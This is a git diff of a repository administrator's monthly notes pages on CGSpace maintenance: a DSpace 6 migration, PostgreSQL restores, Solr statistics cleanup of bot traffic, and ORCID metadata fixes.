            2020-01-30

            • About to start working on the DSpace 6 port and I’m looking at commits that are in the not-yet-tagged DSpace 6.4: diff --git a/docs/2020-02/index.html b/docs/2020-02/index.html index 2a6625730..9c6d0ae94 100644 --- a/docs/2020-02/index.html +++ b/docs/2020-02/index.html @@ -38,7 +38,7 @@ The code finally builds and runs with a fresh install "/> - + @@ -153,7 +153,7 @@ CREATE EXTENSION pgcrypto;
          -
          dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
          +
          dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
           
          • Then I ran dspace database migrate and got an error:
          @@ -260,17 +260,17 @@ org.dspace.discovery.SearchServiceException: Invalid UUID string: 111210
        • If I look in Solr’s search core I do actually see items with integers for their resource ID, which I think are all supposed to be UUIDs now…
        • I dropped all the documents in the search core:
        -
        $ http --print b 'http://localhost:8080/solr/search/update?stream.body=<delete><query>*:*</query></delete>&commit=true'
        +
        $ http --print b 'http://localhost:8080/solr/search/update?stream.body=<delete><query>*:*</query></delete>&commit=true'
         
        • Still didn’t work, so I’m going to try a clean database import and migration:
        $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
         $ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost dspace_2020-01-27.backup
        -$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
         $ psql -h localhost -U postgres dspace63                               
         dspace63=# CREATE EXTENSION pgcrypto;
        -dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
        +dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
         dspace63=# DROP VIEW eperson_metadata;
         dspace63=# \q
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
        @@ -365,22 +365,22 @@ $ podman run --name dspacedb10 -v dspacedb_data:/var/lib/postgresql/data -e POST
         $ createuser -h localhost -U postgres --pwprompt dspacetest
         $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
         $ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest superuser;'
         $ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
         $ pg_restore -h localhost -U postgres -d dspace63 -O --role=dspacetest -h localhost ~/Downloads/cgspace_2020-02-06.backup
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
         $ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspace63
        -$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
        +$ psql -h localhost -U postgres -c 'alter user dspacetest nosuperuser;'
         $ psql -h localhost -U postgres dspace63                               
         dspace63=# CREATE EXTENSION pgcrypto;
        -dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
        +dspace63=# DELETE FROM schema_version WHERE version IN ('5.0.2015.01.27', '5.6.2015.12.03.2', '5.6.2016.08.08', '5.0.2017.04.28', '5.0.2017.09.25', '5.8.2015.12.03.3');
         dspace63=# DROP VIEW eperson_metadata;
         dspace63=# \q
         
        • I purged ~33,000 hits from the “Jersey/2.6” bot in CGSpace’s statistics using my check-spider-hits.sh script:
        $ ./check-spider-hits.sh -d -p -f /tmp/jersey -s statistics -u http://localhost:8081/solr
        -$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s "statistics-${year}" -u http://localhost:8081/solr; done
        +$ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jersey -s "statistics-${year}" -u http://localhost:8081/solr; done
         
        • I noticed another user agen in the logs that we should add to the list:
        @@ -389,23 +389,23 @@ $ for year in 2018 2017 2016 2015; do ./check-spider-hits.sh -d -p -f /tmp/jerse
      • I made an issue on the COUNTER-Robots repository
      • I found a nice tool for exporting and importing Solr records and it seems to work for exporting our 2019 stats from the large statistics core!
      -
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
      +
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01.json -f 'dateYearMonth:2019-01' -k uid
       $ ls -lh /tmp/statistics-2019-01.json
       -rw-rw-r-- 1 aorth aorth 3.7G Feb  6 09:26 /tmp/statistics-2019-01.json
       
      • Then I tested importing this by creating a new core in my development environment:
      -
      $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace/solr/statistics&dataDir=/home/aorth/dspace/solr/statistics-2019/data'
      +
      $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace/solr/statistics&dataDir=/home/aorth/dspace/solr/statistics-2019/data'
       $ ./run.sh -s http://localhost:8080/solr/statistics-2019 -a import -o ~/Downloads/statistics-2019-01.json -k uid
       
      • This imports the records into the core, but DSpace can’t see them, and when I restart Tomcat the core is not seen by Solr…
      • I got the core to load by adding it to dspace/solr/solr.xml manually, ie:
      -
        <cores adminPath="/admin/cores">
      +
        <cores adminPath="/admin/cores">
         ...
      -    <core name="statistics" instanceDir="statistics" />
      -    <core name="statistics-2019" instanceDir="statistics">
      -        <property name="dataDir" value="/home/aorth/dspace/solr/statistics-2019/data" />
      +    <core name="statistics" instanceDir="statistics" />
      +    <core name="statistics-2019" instanceDir="statistics">
      +        <property name="dataDir" value="/home/aorth/dspace/solr/statistics-2019/data" />
           </core>
         ...
         </cores>
      @@ -439,7 +439,7 @@ $ make
       $ ./bin/create-links-in ~/.local/bin
       $ export FLAMEGRAPH_DIR=/home/aorth/src/git/FlameGraph
       $ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
      -$ export JAVA_OPTS="-XX:+PreserveFramePointer"
      +$ export JAVA_OPTS="-XX:+PreserveFramePointer"
       $ ~/dspace63/bin/dspace index-discovery -b &
       # pid of tomcat java process
       $ perf-java-flames 4478
      @@ -485,12 +485,12 @@ schedtool -D -e ~/dspace63/bin/dspace index-discovery -b  5112.96s user 127.80s
       
    $ export JAVA_HOME=/usr/lib/jvm/java-8-openjdk
     $ export PERF_RECORD_SECONDS=60
    -$ export JAVA_OPTS="-XX:+PreserveFramePointer"
    +$ export JAVA_OPTS="-XX:+PreserveFramePointer"
     $ time schedtool -D -e ~/dspace/bin/dspace index-discovery -b &
     # process id of java indexing process (not Tomcat)
     $ perf-java-record-stack 169639
     $ sudo perf script -i /tmp/perf-169639.data > out.dspace510-1
    -$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash > out.dspace510-1.svg
    +$ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' | ../FlameGraph/flamegraph.pl --color=java --hash > out.dspace510-1.svg
     
    • All data recorded on my laptop with the same kernel, same boot, etc.
    • CGSpace 5.8 (with Atmire patches):
    • @@ -525,14 +525,14 @@ $ cat out.dspace510-1 | ../FlameGraph/stackcollapse-perf.pl | grep -E '^java' |
      • Maria from Bioversity asked me to add some ORCID iDs to our controlled vocabulary so I combined them with our existing ones and updated the names from the ORCID API:
      -
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-02-11-combined-orcids.txt
      +
      $ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/bioversity-orcid-ids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort | uniq > /tmp/2020-02-11-combined-orcids.txt
       $ ./resolve-orcids.py -i /tmp/2020-02-11-combined-orcids.txt -o /tmp/2020-02-11-combined-names.txt -d
       # sort names, copy to cg-creator-id.xml, add XML formatting, and then format with tidy (preserving accents)
       $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-id.xml
       
      • Then I noticed some author names had changed, so I captured the old and new names in a CSV file and fixed them using fix-metadata-values.py:
      -
      $ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
      +
      $ ./fix-metadata-values.py -i 2020-02-11-correct-orcid-ids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -t correct -m 240 -d
       
      • On a hunch I decided to try to add these ORCID iDs to existing items that might not have them yet
          @@ -541,22 +541,22 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
        dc.contributor.author,cg.creator.id
        -"Staver, Charles",charles staver: 0000-0002-4532-6077
        -"Staver, C.",charles staver: 0000-0002-4532-6077
        -"Fungo, R.",Robert Fungo: 0000-0002-4264-6905
        -"Remans, R.",Roseline Remans: 0000-0003-3659-8529
        -"Remans, Roseline",Roseline Remans: 0000-0003-3659-8529
        -"Rietveld A.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, A.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, A.M.",Anne Rietveld: 0000-0002-9400-9473
        -"Rietveld, Anne M.",Anne Rietveld: 0000-0002-9400-9473
        -"Fongar, A.",Andrea Fongar: 0000-0003-2084-1571
        -"Müller, Anna",Anna Müller: 0000-0003-3120-8560
        -"Müller, A.",Anna Müller: 0000-0003-3120-8560
        +"Staver, Charles",charles staver: 0000-0002-4532-6077
        +"Staver, C.",charles staver: 0000-0002-4532-6077
        +"Fungo, R.",Robert Fungo: 0000-0002-4264-6905
        +"Remans, R.",Roseline Remans: 0000-0003-3659-8529
        +"Remans, Roseline",Roseline Remans: 0000-0003-3659-8529
        +"Rietveld A.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, A.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, A.M.",Anne Rietveld: 0000-0002-9400-9473
        +"Rietveld, Anne M.",Anne Rietveld: 0000-0002-9400-9473
        +"Fongar, A.",Andrea Fongar: 0000-0003-2084-1571
        +"Müller, Anna",Anna Müller: 0000-0003-3120-8560
        +"Müller, A.",Anna Müller: 0000-0003-3120-8560
         
        • Running the add-orcid-identifiers-csv.py script I added 144 ORCID iDs to items on CGSpace!
        -
        $ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
        +
        $ ./add-orcid-identifiers-csv.py -i /tmp/2020-02-11-add-orcid-ids.csv -db dspace -u dspace -p 'fuuu'
         
        • Minor updates to all Python utility scripts in the CGSpace git repository
        • Update the spider agent patterns in CGSpace 5_x-prod branch from the latest COUNTER-Robots project @@ -575,7 +575,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/cg-creator-i
        • Peter asked me to update John McIntire’s name format on CGSpace so I ran the following PostgreSQL query:
        -
        dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
        +
        dspace=# UPDATE metadatavalue SET text_value='McIntire, John M.' WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value='McIntire, John';
         UPDATE 26
         

        2020-02-17

          @@ -622,10 +622,10 @@ UPDATE 26
      -
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=dns:/squeeze3.bronco.co.uk./&rows=0"
      -<?xml version="1.0" encoding="UTF-8"?>
      +
      $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=dns:/squeeze3.bronco.co.uk./&rows=0"
      +<?xml version="1.0" encoding="UTF-8"?>
       <response>
      -<lst name="responseHeader"><int name="status">0</int><int name="QTime">4</int><lst name="params"><str name="q">dns:/squeeze3.bronco.co.uk./</str><str name="rows">0</str></lst></lst><result name="response" numFound="86044" start="0"></result>
      +<lst name="responseHeader"><int name="status">0</int><int name="QTime">4</int><lst name="params"><str name="q">dns:/squeeze3.bronco.co.uk./</str><str name="rows">0</str></lst></lst><result name="response" numFound="86044" start="0"></result>
       </response>
       
      • The totals in each core are: @@ -641,8 +641,8 @@ UPDATE 26
      • I will purge them from each core one by one, ie:
      -
      $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
      -$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
      +
      $ curl -s "http://localhost:8081/solr/statistics-2015/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
      +$ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:squeeze3.bronco.co.uk.</query></delete>"
       
      • Deploy latest Tomcat and PostgreSQL JDBC driver changes on CGSpace (linode18)
      • Deploy latest 5_x-prod branch on CGSpace (linode18)
      • @@ -654,13 +654,13 @@ $ curl -s "http://localhost:8081/solr/statistics-2014/update?softCommit=tru
      • I ran the dspace cleanup -v process on CGSpace and got an error:
      -
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      -  Detail: Key (bitstream_id)=(183996) is still referenced from table "bundle".
      +
      Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
      +  Detail: Key (bitstream_id)=(183996) is still referenced from table "bundle".
       
      • The solution is, as always:
      # su - postgres
      -$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
      +$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (183996);'
       UPDATE 1
       
      • Аdd one more new Bioversity ORCID iD to the controlled vocabulary on CGSpace
      • @@ -671,7 +671,7 @@ UPDATE 1
    -
    $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
    +
    $ dspace user -a -m wow@me.com -g Felix -s Shaw -p 'fuananaaa'
     
    • For some reason the Atmire Content and Usage Analysis (CUA) module’s Usage Statistics is drawing blank graphs
        @@ -708,7 +708,7 @@ org.springframework.web.util.NestedServletException: Handler processing failed;
    -
    # grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
    +
    # grep -c 'initialize class org.jfree.chart.JFreeChart' dspace.log.2020-0*
     dspace.log.2020-01-12:4
     dspace.log.2020-01-13:66
     dspace.log.2020-01-14:4
    @@ -724,25 +724,25 @@ dspace.log.2020-01-21:4
     
  • I deployed the fix on CGSpace (linode18) and I was able to see the graphs in the Atmire CUA Usage Statistics…
  • On an unrelated note there is something weird going on in that I see millions of hits from IP 34.218.226.147 in Solr statistics, but if I remember correctly that IP belongs to CodeObia’s AReS explorer, but it should only be using REST and therefore no Solr statistics…?
  • -
    $ curl -s "http://localhost:8081/solr/statistics-2018/select" -d "q=ip:34.218.226.147&rows=0"
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ curl -s "http://localhost:8081/solr/statistics-2018/select" -d "q=ip:34.218.226.147&rows=0"
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">811</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="rows">0</str></lst></lst><result name="response" numFound="5536097" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">811</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="rows">0</str></lst></lst><result name="response" numFound="5536097" start="0"></result>
     </response>
     
    • And there are apparently two million from last month (2020-01):
    -
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=ip:34.218.226.147&fq=dateYearMonth:2020-01&rows=0"
    -<?xml version="1.0" encoding="UTF-8"?>
    +
    $ curl -s "http://localhost:8081/solr/statistics/select" -d "q=ip:34.218.226.147&fq=dateYearMonth:2020-01&rows=0"
    +<?xml version="1.0" encoding="UTF-8"?>
     <response>
    -<lst name="responseHeader"><int name="status">0</int><int name="QTime">248</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="fq">dateYearMonth:2020-01</str><str name="rows">0</str></lst></lst><result name="response" numFound="2173455" start="0"></result>
    +<lst name="responseHeader"><int name="status">0</int><int name="QTime">248</int><lst name="params"><str name="q">ip:34.218.226.147</str><str name="fq">dateYearMonth:2020-01</str><str name="rows">0</str></lst></lst><result name="response" numFound="2173455" start="0"></result>
     </response>
     
    • But when I look at the nginx access logs for the past month or so I only see 84,000, all of which are on /rest and none of which are to XMLUI:
    # zcat /var/log/nginx/*.log.*.gz | grep -c 34.218.226.147
     84322
    -# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
    +# zcat /var/log/nginx/*.log.*.gz | grep 34.218.226.147 | grep -c '/rest'
     84322
     
    • Either the requests didn’t get logged, or there is some mixup with the Solr documents (fuck!) @@ -758,13 +758,13 @@ dspace.log.2020-01-21:4
    • Anyways, I faceted by IP in 2020-01 and see:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-01&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=*:*&fq=dateYearMonth:2020-01&rows=0&wt=json&indent=true&facet=true&facet.field=ip'
     ...
    -        "172.104.229.92",2686876,
    -        "34.218.226.147",2173455,
    -        "163.172.70.248",80945,
    -        "163.172.71.24",55211,
    -        "163.172.68.99",38427,
    +        "172.104.229.92",2686876,
    +        "34.218.226.147",2173455,
    +        "163.172.70.248",80945,
    +        "163.172.71.24",55211,
    +        "163.172.68.99",38427,
     
    • Surprise surprise, the top two IPs are from AReS servers… wtf.
    • The next three are from Online in France and they are all using this weird user agent and making tens of thousands of requests to Discovery:
    • @@ -775,14 +775,14 @@ dspace.log.2020-01-21:4
    • I need to see why AReS harvesting is inflating the stats, as it should only be making REST requests…
    • Shiiiiit, I see 84,000 requests from the AReS IP today alone:
    -
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&rows=0&wt=json&indent=true'
    +
    $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-22*+AND+ip:172.104.229.92&rows=0&wt=json&indent=true'
     ...
    -  "response":{"numFound":84594,"start":0,"docs":[]
    +  "response":{"numFound":84594,"start":0,"docs":[]
     
    • Fuck! And of course the ILRI websites doing their daily REST harvesting are causing issues too, from today alone:
    -
            "2a01:7e00::f03c:91ff:fe9a:3a37",35512,
    -        "2a01:7e00::f03c:91ff:fe18:7396",26155,
    +
            "2a01:7e00::f03c:91ff:fe9a:3a37",35512,
    +        "2a01:7e00::f03c:91ff:fe18:7396",26155,
     
    • I need to try to make some requests for these URLs and observe if they make a statistics hit:
        @@ -793,12 +793,12 @@ dspace.log.2020-01-21:4
      • Those are the requests AReS and ILRI servers are making… nearly 150,000 per day!
      • Well that settles it!
      -
      $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      -  "response":{"numFound":12,"start":0,"docs":[
      -$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450'
      -$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
      -$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      -  "response":{"numFound":62,"start":0,"docs":[
      +
      $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      +  "response":{"numFound":12,"start":0,"docs":[
      +$ curl -s 'https://dspacetest.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&limit=50&offset=82450'
      +$ curl -s 'http://localhost:8081/solr/statistics/update?softCommit=true'
      +$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+statistics_type:view&fq=ip:78.128.99.24&rows=10&wt=json&indent=true' | grep numFound
      +  "response":{"numFound":62,"start":0,"docs":[
       
      • A REST request with limit=50 will make exactly fifty statistics_type=view statistics in the Solr core… fuck.
          @@ -817,8 +817,8 @@ $ curl -s 'http://localhost:8081/solr/statistics/select?q=time:2020-02-23*+AND+s
        • I tried to add the IPs to our nginx IP bot mapping but it doesn’t seem to work… WTF, why is everything broken?!
        • Oh lord have mercy, the two AReS harvester IPs alone are responsible for 42 MILLION hits in 2019 and 2020 so far by themselves:
        -
        $ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&rows=0&wt=json&indent=true' | grep numFound
        -  "response":{"numFound":42395486,"start":0,"docs":[]
        +
        $ http 'http://localhost:8081/solr/statistics/select?q=ip:34.218.226.147+OR+ip:172.104.229.92&rows=0&wt=json&indent=true' | grep numFound
        +  "response":{"numFound":42395486,"start":0,"docs":[]
         
        • I modified my check-spider-hits.sh script to create a version that works with IPs and purged 47 million stats from Solr on CGSpace:
        @@ -856,7 +856,7 @@ Total number of bot hits purged: 5535399
    -
    add_header X-debug-message "ua is $ua" always;
    +
    add_header X-debug-message "ua is $ua" always;
     
    • Then in the HTTP response you see:
    @@ -966,7 +966,7 @@ Total number of bot hits purged: 2228
    • Then I purged about 200,000 Baidu hits from the 2015 to 2019 statistics cores with a few manual delete queries because they didn’t have a proper user agent and the only way to identify them was via DNS:
    -
    $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"
    +
    $ curl -s "http://localhost:8081/solr/statistics-2016/update?softCommit=true" -H "Content-Type: text/xml" --data-binary "<delete><query>dns:*crawl.baidu.com.</query></delete>"
     
    • Jesus, the more I keep looking, the more I see ridiculous stuff…
    • In 2019 there were a few hundred thousand requests from CodeObia on Orange Jordan network… @@ -1024,7 +1024,7 @@ Total number of bot hits purged: 14110
    • Though looking in my REST logs for the last month I am second guessing my judgement on 45.5.186.2 because I see user agents like “Microsoft Office Word 2014”
    • Actually no, the overwhelming majority of these are coming from something harvesting the REST API with no user agent:
    -
    # zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\" '{print $6}' | sort | uniq -c | sort -h
    +
    # zgrep 45.5.186.2 /var/log/nginx/rest.log.[1234]* | awk -F\" '{print $6}' | sort | uniq -c | sort -h
           1 Microsoft Office Word 2014
           1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office)
           1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    @@ -1038,10 +1038,10 @@ Total number of bot hits purged: 14110
     
    • I see lots of requests coming from the following user agents:
    -
    "Apache-HttpClient/4.5.7 (Java/11.0.3)"
    -"Apache-HttpClient/4.5.7 (Java/11.0.2)"
    -"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)"
    -"EventMachine HttpClient"
    +
    "Apache-HttpClient/4.5.7 (Java/11.0.3)"
    +"Apache-HttpClient/4.5.7 (Java/11.0.2)"
    +"LinkedInBot/1.0 (compatible; Mozilla/5.0; Jakarta Commons-HttpClient/4.3 +http://www.linkedin.com)"
    +"EventMachine HttpClient"
     
    • I should definitely add HttpClient to the bot user agents…
    • Also, while bot, spider, and crawl are in the pattern list already and can be used for case-insensitive matching when used by DSpace in Java, I can’t do case-insensitive matching in Solr with check-spider-hits.sh @@ -1171,7 +1171,7 @@ Total number of bot hits purged: 159
    • I tried to migrate the 2019 Solr statistics again on CGSpace because the automatic sharding failed last month:
    -
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
    +
    $ export JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m"
     $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-util.log.$(date --iso-8601)
     
    • Interestingly I saw this in the Solr log:
    • @@ -1186,7 +1186,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-ut
    • Manually create a core in the DSpace 6.4-SNAPSHOT instance on my local environment:
    -
    $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace63/solr/statistics&dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
    +
    $ curl 'http://localhost:8080/solr/admin/cores?action=CREATE&name=statistics-2019&instanceDir=/home/aorth/dspace63/solr/statistics&dataDir=/home/aorth/dspace63/solr/statistics-2019/data'
     
    • After that the statistics-2019 core was immediately available in the Solr UI, but after restarting Tomcat it was gone
        @@ -1195,7 +1195,7 @@ $ schedtool -D -e ionice -c2 -n7 dspace stats-util -s >> log/cron-stats-ut
      • First export a small slice of 2019 stats from the main CGSpace statistics core, skipping Atmire schema additions:
      -
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
      +
      $ ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2019-01-16.json -f 'time:2019-01-16*' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId
       
      • Then import into my local statistics core:
      @@ -1226,8 +1226,8 @@ Moving: 21993 into core statistics-2019
    -
    <meta content="Thu hoạch v&agrave; bảo quản c&agrave; ph&ecirc; ch&egrave; đ&uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)" name="citation_title">
    -<meta name="citation_title" content="Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)" />
    +
    <meta content="Thu hoạch v&agrave; bảo quản c&agrave; ph&ecirc; ch&egrave; đ&uacute;ng kỹ thuật (Harvesting and storing Arabica coffee)" name="citation_title">
    +<meta name="citation_title" content="Thu hoạch và bảo quản cà phê chè đúng kỹ thuật (Harvesting and storing Arabica coffee)" />
     
    diff --git a/docs/2020-03/index.html b/docs/2020-03/index.html index e4204b42e..7e9d57504 100644 --- a/docs/2020-03/index.html +++ b/docs/2020-03/index.html @@ -42,7 +42,7 @@ You need to download this into the DSpace 6.x source and compile it "/> - + @@ -141,7 +141,7 @@ You need to download this into the DSpace 6.x source and compile it -
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
    +
    $ export JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8"
     $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
     

    2020-03-03

      @@ -160,7 +160,7 @@ $ ~/dspace63/bin/dspace solr-upgrade-statistics-6x
    -
    $ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
    +
    $ ./fix-metadata-values.py -i 2020-03-04-fix-1-ilri-subject.csv -db dspace -u dspace -p 'fuuu' -f cg.subject.ilri -m 203 -t correct -d
     
